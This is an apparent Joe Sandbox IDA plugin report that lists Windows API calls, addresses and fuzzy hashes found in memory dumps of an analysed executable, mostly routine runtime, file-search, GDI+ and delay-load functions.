                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: H_prolog
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: H_prolog
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC8289
                                                              • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                              • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC13E1
                                                              • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                              • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: H_prolog
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC13E1
                                                              • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                              • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CDB098
                                                              • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00CEACF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                              • Part of subcall function 00CEB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CE9813,00000001,00000364,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CEB177
                                                            • _free.LIBCMT ref: 00CEC4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CE9813,00000001,00000364,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CEB177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00CE3C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC5AC2
                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            APIs
                                                              • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                              • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                              • Part of subcall function 00CCA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00CD0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                              • Part of subcall function 00CDA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 00CDE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CD1B3E), ref: 00CDDD92
                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,00CC97BE), ref: 00CC98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                            • Instruction ID: cc07e88e0541398dd6d04932ef4a4972d2b24716ddb40f41c925dd842d458061
                                                            • Opcode Fuzzy Hash: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                            • Instruction Fuzzy Hash: A5B012D535C248AC3144714E2D42C3B010CC0C0B28330403FFA05C83C1D8406C103932
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                            • Instruction ID: 8c101ed0473f597e093d72fa7a866f0a20d50b8a6de4be5e3516e933685b9e89
                                                            • Opcode Fuzzy Hash: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                            • Instruction Fuzzy Hash: 9DB012D135C244AC3144720A2D02C3B010CC0C1B28330C03FFE09C83C1D840AC043432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                            • Instruction ID: 98e1d1531db4a489c56d3a40a5c3688a3ddbaae7d986e228578123b867f628a7
                                                            • Opcode Fuzzy Hash: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                            • Instruction Fuzzy Hash: DBB012E135C154AC3144710A2E03C3B018CC0C0B28330403FFA05C83C1DC406D013432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                            • Instruction ID: 38709f3a1525955a5090fee80ce97513b68b79b595965d2b3fedc11caa7895bb
                                                            • Opcode Fuzzy Hash: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                            • Instruction Fuzzy Hash: 75B012D135D184AC3148710A2D02C3B010DC0C1B28330803FFE05C83C1D840AC403432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                            • Instruction ID: f97fd66f695532eb05434c82143a4933a4fa1caa00f77ffb861a854a69bf9435
                                                            • Opcode Fuzzy Hash: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                            • Instruction Fuzzy Hash: 3FB012E135D284BC3188720A2D02C3B010DC0C0B28330413FFA05C83C1D8406C443432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
